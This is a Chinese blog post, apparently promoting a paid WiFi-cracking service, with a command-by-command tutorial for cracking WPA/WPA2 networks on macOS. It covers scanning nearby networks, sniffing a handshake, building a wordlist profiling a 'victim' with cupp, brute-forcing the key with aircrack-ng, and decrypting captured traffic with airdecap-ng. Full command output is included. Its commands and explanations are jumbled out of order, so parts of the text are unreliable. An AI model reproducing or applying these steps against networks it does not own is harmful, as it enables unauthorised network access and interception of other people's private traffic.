MacOS破解WiFi(WPA、WPA2)

caocao1年前教程185

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

2020年的寒假过得属实弟弟,我在家里默默地刷安全牛的教程,最新刷到了“无线攻击”这一章,虽然在学校的机器上安装了Kali虚机,但是没有USB无线网卡。于是用MacBook尝试了一下。 PS:本文参考了网络上众多的文章,但是有我自己发挥的部分。由于现在绝大部分无线网络的加密方法都是WPA、WPA2,弱点比较大的WEP我现在还没碰到过,已经很少使用,而WPA、WPA2几乎没有弱点,想要破解只能暴力穷举,理论上只要你的密码设置的足够复杂,就是不可破解的(但谁会把WiFi密码设置的这么复杂)。

如何发现附近的网络

这里的发现网络,不是单指如何获得附近有哪些WiFi,而是附近有哪些WiFi,他们分别用的什么加密密钥。在Kali上实现这一点,我们需要使用airmon-ng来发现附近的WiFi,而MacBook自带了强大的airport工具。

使用airport

为了方便我们使用airport,先在命令行中执行以下命令:

airport -s

上述命令让我们可以在命令行直接输入airport来使用它。

发现附近网络

在命令行输入:

Princeling-Mac at /opt ❯ airport -s
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                     FAST_236864 cc:34:29:23:68:64 -81  6,-1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                     FAST_20C20A 78:eb:14:20:c2:0a -77  12      Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
                     FAST_11D9DC c0:61:18:11:d9:dc -59  7       Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
                        iTV-KtYh 46:7b:bb:b9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)
                   ChinaNet-KtYh 44:7b:bb:a9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)

得到如下结果:

airport en0 sniff 7

等待握手信号

事实上,我们的暴力穷举不可能是不停的给路由器发送请求,这种做法吃力又不讨好。网络上有很多描述WPA破解原理的文章,可以去阅读。简单地说,我们需要侦听到一个用户的正确登录,然后获取登录过程中的两组密钥,之后就可以离线破解了。

侦听数据

ifconfig
kali攻击无线网

得到。如果有很多网卡,选择你用来连接WiFi的那个。7是上文中,发现附近网络的CHANNEL列,需要和你想要破解的目标网络一致。运行该命令的时候,WiFi的图标会发生改变。这个时候你的网络连接也会断开,按下ctrl+c结束侦听。

brew install airmon-ng
aircrack-ng /tmp/airportSniffLbhZSp.cap
Princeling-Mac at /opt ❯ aircrack-ng /tmp/airportSniffLbhZSp.cap
Opening /tmp/airportSniffLbhZSp.cap
Read 8351 packets.
   #  BSSID              ESSID                     Encryption
   1  C0:61:18:11:D9:DC  FAST_11D9DC               WPA (1 handshake)
   2  CC:34:29:23:68:64  FAST_236864               No data - WEP or WPA
Index number of target network ?
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap

分析数据

不可避免的,还是要安装airmon-ng。安装完成后:

在抓包过程中,我用手机登录了一下无线网FAST_11D9DC。可以看到airport已经抓到了一组握手数据。

在“Index number of target network ?”这里输入想要破解的WiFi,由于2没有握手数据,所以我们输入1。

aircrack破解

python3 cupp.py -I

dict.txt是字典文件,c0:61:18:11:d9:dc是发现附近网络中的BSSID,/tmp/airportSniffLbhZSp.cap是数据包。

字典文件在哪儿?

  1. 互联网下载:在网络上有很多人搜集到的WiFi字典,如果是公共场合,这些字典的命中率还是很高的。但是字典很庞大,暴力穷举需要消耗很长时间。
  2. 自己制作:如果是在家庭、私人场合的WiFi,字典的质量就显得很重要。这里推荐一个社工字典制作程序。可以去GitHub搜索cupp下载。或者点击这里直达。

简单演示一下cupp的使用。

Princeling-Mac at ~/Documents/GitHub/cupp ❯ python3 cupp.py -I
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: wanglei
> Surname:
> Nickname: princeling
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to wanglei.txt, counting 68 words.
[+] Now load your pistolero with wanglei.txt and shoot! Good luck!
                          Aircrack-ng 1.5.2
  [00:00:00] 8/1 keys tested (88.65 k/s)
  Time left: 0 seconds                                     800.00%
                     KEY FOUND! [ 88888888 ]
  Master Key     : 26 FB 23 5F FE 0B 39 0A C1 12 F3 30 55 FF EE 02
                   CB 7E EA 13 B0 CE D6 7E BB 7E AA 52 1B EA 2E 02
  Transient Key  : 8D E6 57 44 42 BE 95 C2 EC 75 60 FA CA 1A 1A C1
                   C8 31 46 C4 4D DB 98 4D 34 D7 5A D0 15 9F BD 42
                   6C 9C 96 5C FC AE 24 39 83 1D A8 89 C7 71 F9 4A
                   64 D5 DA FB 24 7E 91 47 E6 35 DD 9A 87 A6 A2 5B
  EAPOL HMAC     : 8D 62 A3 8A 42 D1 68 EA 4B 89 FC FC B6 BC C9 AA

不知道就一路回车下去,填写一些相关信息,就可以生成字典了。

然后用这个字典破解WiFi内容。

如果你的字典中包含密码,则会出现如下界面:

kali攻击无线网

说明破解成功。

airdecap分析包

现在我们拿到了密码。但是如果折腾了这么半天,目的就是为了蹭WiFi,感觉有点呆呆的。

有了WiFi的密码,实际上我们可以对WiFi的数据包进行解包,工具就是airdecap

这个时候再拿出刚刚抓取的数据包,用Wireshark打开。

airdecap-ng -e FAST_11D9DC -b c0:61:18:11:d9:dc -p 88888888 ./Downloads/11d9dc.cap

可以看到全都是802.11的协议,并且数据帧全都是加密的数据。

在命令行输入:

e是ESSID,b是BSSID,p是破解出来的WiFi密码。

运行成功后,会在目标目录生成对应的.dec文件。

再用Wireshark打开,就能看到解密后的包内容了。

相关文章

Oracle字符集研究ppt课件

Oracle字符集研究ppt课件

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 ORACLE字符集研讨...

在虚拟机中安装Windows server 2003 详细图文安装过程

在虚拟机中安装Windows server 2003 详细图文安装过程

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 虚拟机中 Windows...

CANopen对象字典生成办法

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 引言 CANopen协议...

Linux 发行版全介绍(大图版)

Linux 发行版全介绍(大图版)

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 严格来讲,Linux 这...